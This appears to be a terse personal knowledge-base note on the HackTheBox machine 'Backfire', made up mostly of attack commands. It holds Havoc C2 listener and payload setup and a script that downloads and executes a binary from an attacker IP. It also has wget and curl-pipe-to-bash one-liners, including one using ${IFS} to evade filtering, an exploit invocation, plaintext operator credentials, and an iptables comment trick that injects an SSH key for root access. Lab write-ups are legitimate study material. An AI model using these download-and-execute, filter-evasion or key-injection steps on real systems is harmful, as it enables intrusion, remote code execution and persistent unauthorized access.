Malleum Knowledge Base

Backfire

2 min read

Listener

https -L 10.10.14.68 -l 443

profiles new -b https://10.10.14.68:443 --arch x64 -o linux hackthebox64_linux

profiles generate hackthebox64_linux

mv $executeable bad

#!/bin/bash

# Define the URL and local file name
URL="http://10.10.14.68/bad"
FILE_NAME="downloaded_binary"

# Download the file
curl -o $FILE_NAME $URL

# Check if the download was successful
if [ -f "$FILE_NAME" ]; then
    echo "Download successful."

    # Make the file executable
    chmod +x $FILE_NAME

    # Execute the file
    echo "Executing the file..."
    ./$FILE_NAME
else
    echo "Failed to download the file."
fi

wget http://10.10.14.93/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh

curl${IFS}10.10.14.93/bad.sh${IFS}|${IFS}bash

Enumeration

Discovered open port 22/tcp on 10.129.140.150 Discovered open port 443/tcp on 10.129.140.150 Discovered open port 8000/tcp on 10.129.140.150

2. Operators Section

  • Lists two user accounts with plaintext credentials:
    • User ilya: CobaltStr1keSuckz!
    • User sergej: 1w4nt2sw1tch2h4rdh4tc2
  • Security Implications:
    • Credentials are stored in plaintext and could be exploited if the file is accessed by unauthorized individuals.

3. Demon Configuration

  • Contains parameters for payload behavior:
    • Sleep (delay) and Jitter (randomization).
    • Process injection paths for 32-bit and 64-bit binaries (notepad.exe).

4. Listeners Section

  • Defines an HTTP listener named Demon Listener:
    • Binds to 127.0.0.1 on port 8443.
    • Host: backfire.htb (suggests it operates in a controlled environment).
    • Uses TLS (Secure = true).
python3 exploit6.py --target https://10.129.140.150 -i 10.10.14.126 -p 80

Install Havoc

sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev python3-dev libboost-all-dev mingw-w64 nasm
cd teamserver
cd teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build
  • Copy the Downloaded files
cp hacov.yaotl /opt/tools/Havoc/profiles/

# Run the teamserver
./havoc server --profile ./profiles/havoc.yaotl -v --debug
make client-build
# Run the client
./havoc client
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICzaWxLn0itXb7bpD3Yf7TcZVS6PdFYWAstQeyaH/Lzx user@parrot\n'

Graph View